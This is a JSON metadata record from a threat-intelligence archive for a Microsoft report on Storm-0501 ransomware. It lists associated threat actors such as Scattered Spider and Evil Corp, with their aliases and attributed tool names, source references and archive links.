"language": "EN", "sources": [ "Malpedia", "MISPGALAXY", "MITRE" ], "references": [ "https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/" ], "report_names": [ "storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "7da6012f-680b-48fb-80c4-1b8cf82efb9c", "created_at": "2023-11-01T02:01:06.643737Z", "updated_at": "2026-04-10T02:00:05.340198Z", "deleted_at": null, "main_name": "Scattered Spider", "aliases": [ "Scattered Spider", "Roasted 0ktapus", "Octo Tempest", "Storm-0875", "UNC3944" ], "source_name": "MITRE:Scattered Spider", "tools": [ "WarzoneRAT", "Rclone", "LaZagne", "Mimikatz", "Raccoon Stealer", "ngrok", "BlackCat", "ConnectWise" ], "source_id": "MITRE", "reports": null }, { "id": "50068c14-343c-4491-b568-df41dd59551c", "created_at": "2022-10-25T15:50:23.253218Z", "updated_at": "2026-04-10T02:00:05.234464Z", "deleted_at": null, "main_name": "Indrik Spider", "aliases": [ "Indrik Spider", "Evil Corp", "Manatee Tempest", "DEV-0243", "UNC2165" ], "source_name": "MITRE:Indrik Spider", "tools": [ "Mimikatz", "PsExec", "Dridex", "WastedLocker", "BitPaymer", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "c3b908de-3dd1-4e5d-ba24-5af8217371f0", "created_at": "2023-10-03T02:00:08.510742Z", "updated_at": "2026-04-10T02:00:03.374705Z", "deleted_at": null, "main_name": "Scattered Spider", "aliases": [ "UNC3944", "Scattered Swine", "Octo Tempest", "DEV-0971", "Starfraud", "Muddled Libra", "Oktapus", "Scatter Swine", "0ktapus", "Storm-0971" ], "source_name": "MISPGALAXY:Scattered Spider", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b296f34c-c424-41da-98bf-90312a5df8ef", "created_at": "2024-06-19T02:03:08.027585Z", "updated_at": "2026-04-10T02:00:03.621193Z", "deleted_at": null, "main_name": "GOLD DRAKE", "aliases": [ "Evil Corp", "Indrik Spider ", "Manatee Tempest " ], "source_name": "Secureworks:GOLD DRAKE", "tools": [ "BitPaymer", "Cobalt Strike", "Covenant", "Donut", "Dridex", "Hades", "Koadic", "LockBit", "Macaw Locker", "Mimikatz", "Payload.Bin", "Phoenix CryptoLocker", "PowerShell Empire", "PowerSploit", "SocGholish", "WastedLocker" ], "source_id": "Secureworks", "reports": null }, { "id": "d706edf6-cb86-4611-99e1-4b464e9dc5b9", "created_at": "2023-01-06T13:46:38.839083Z", "updated_at": "2026-04-10T02:00:03.117987Z", "deleted_at": null, "main_name": "INDRIK SPIDER", "aliases": [ "Manatee Tempest" ], "source_name": "MISPGALAXY:INDRIK SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c2f84ab8-e990-4fa8-97db-81eb3166b207", "created_at": "2025-10-29T02:00:51.915334Z", "updated_at": "2026-04-10T02:00:05.318636Z", "deleted_at": null, "main_name": "Storm-0501", "aliases": [ "Storm-0501" ], "source_name": "MITRE:Storm-0501", "tools": [ "Impacket", "Tasklist", "Cobalt Strike", "Rclone", "Nltest", "AADInternals" ], "source_id": "MITRE", "reports": null }, { "id": "eb01bdec-5c18-4479-b343-cf58076dacf1", "created_at": "2024-08-10T02:02:56.273673Z", "updated_at": "2026-04-10T02:00:03.773129Z", "deleted_at": null, "main_name": "GOLD CRESCENT", "aliases": [ "Hunters International", "World Leaks" ], "source_name": "Secureworks:GOLD CRESCENT", "tools": [ "Hunters International", "SharpRhino" ], "source_id": "Secureworks", "reports": null }, { "id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b", "created_at": "2022-10-25T16:07:23.303713Z", "updated_at": "2026-04-10T02:00:04.530417Z", "deleted_at": null, "main_name": "ALPHV", "aliases": [ "ALPHV", "ALPHVM", "Ambitious Scorpius", "BlackCat Gang", "UNC4466" ], "source_name": "ETDA:ALPHV", "tools": [ "ALPHV", "ALPHVM", "BlackCat", "GO Simple Tunnel", "GOST", "Impacket", "LaZagne", "MEGAsync", "Mimikatz", "Munchkin", "Noberus", "PsExec", "Remcom", "RemoteCommandExecution", "WebBrowserPassView" ], "source_id": "ETDA", "reports": null }, { "id": "7e7782b0-8b0b-4e92-b58a-c696b6d70ea1", "created_at": "2025-05-29T02:00:03.18524Z", "updated_at": "2026-04-10T02:00:03.843199Z", "deleted_at": null, "main_name": "Storm-0249", "aliases": [ "DEV-0249" ], "source_name": "MISPGALAXY:Storm-0249", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d093e8d9-b093-47b8-a988-2a5cbf3ccec9", "created_at": "2023-10-14T02:03:13.99057Z", "updated_at": "2026-04-10T02:00:04.531987Z", "deleted_at": null, "main_name": "Scattered Spider", "aliases": [ "0ktapus", "LUCR-3", "Muddled Libra", "Octo Tempest", "Scatter Swine", "Scattered Spider", "Star Fraud", "Storm-0875", "UNC3944" ], "source_name": "ETDA:Scattered Spider", "tools": [ "ADRecon", "AnyDesk", "ConnectWise", "DCSync", "FiveTran", "FleetDeck", "Govmomi", "Hekatomb", "Impacket", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "Lumma Stealer", "LummaC2", "Mimikatz", "Ngrok", "PingCastle", "ProcDump", "PsExec", "Pulseway", "Pure Storage FlashArray", "Pure Storage FlashArray PowerShell SDK", "RedLine Stealer", "Rsocx", "RustDesk", "ScreenConnect", "SharpHound", "Socat", "Spidey Bot", "Splashtop", "Stealc", "TacticalRMM", "Tailscale", "TightVNC", "VIDAR", "Vidar Stealer", "WinRAR", "WsTunnel", "gosecretsdump" ], "source_id": "ETDA", "reports": null }, { "id": "9806f226-935f-48eb-b138-6616c9bb9d69", "created_at": "2022-10-25T16:07:23.73153Z", "updated_at": "2026-04-10T02:00:04.729977Z", "deleted_at": null, "main_name": "Indrik Spider", "aliases": [ "Blue Lelantos", "DEV-0243", "Evil Corp", "G0119", "Gold Drake", "Gold Winter", "Manatee Tempest", "Mustard Tempest", "UNC2165" ], "source_name": "ETDA:Indrik Spider", "tools": [ "Advanced Port Scanner", "Agentemis", "Babuk", "Babuk Locker", "Babyk", "BitPaymer", "Bugat", "Bugat v5", "Cobalt Strike", "CobaltStrike", "Cridex", "Dridex", "EmPyre", "EmpireProject", "FAKEUPDATES", "FakeUpdate", "Feodo", "FriedEx", "Hades", "IEncrypt", "LINK_MSIEXEC", "MEGAsync", "Macaw Locker", "Metasploit", "Mimikatz", "PayloadBIN", "Phoenix Locker", "PowerShell Empire", "PowerSploit", "PsExec", "QNAP-Worm", "Raspberry Robin", "RaspberryRobin", "SocGholish", "Vasa Locker", "WastedLoader", "WastedLocker", "cobeacon", "wp_encrypt" ], "source_id": "ETDA", "reports": null }, { "id": "e424a2db-0f5a-4ee5-96d2-5ab16f1f3824", "created_at": "2024-06-19T02:03:08.062614Z", "updated_at": "2026-04-10T02:00:03.655475Z", "deleted_at": null, "main_name": "GOLD HARVEST", "aliases": [ "Octo Tempest ", "Roasted 0ktapus ", "Scatter Swine ", "Scattered Spider ", "UNC3944 " ], "source_name": "Secureworks:GOLD HARVEST", "tools": [ "AnyDesk", "ConnectWise Control", "Logmein" ], "source_id": "Secureworks", "reports": null }, { "id": "6a0c148e-64fe-40fa-a35a-4d9a6ddd7fb0", "created_at": "2024-10-04T02:00:04.769179Z", "updated_at": "2026-04-10T02:00:03.716865Z", "deleted_at": null, "main_name": "Storm-0501", "aliases": [], "source_name": "MISPGALAXY:Storm-0501", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "830ec576-b163-4d11-b711-fee2aa0f2ee1", "created_at": "2026-02-03T02:00:03.446725Z", "updated_at": "2026-04-10T02:00:03.944446Z", "deleted_at": null, "main_name": "TA584", "aliases": [ "Storm-0900" ], "source_name": "MISPGALAXY:TA584", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434903, "ts_updated_at": 1775792179, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/aa876d3205880558d4244c07bff002c63906d9c8.pdf", "text": "https://archive.orkl.eu/aa876d3205880558d4244c07bff002c63906d9c8.txt", "img": "https://archive.orkl.eu/aa876d3205880558d4244c07bff002c63906d9c8.jpg" } }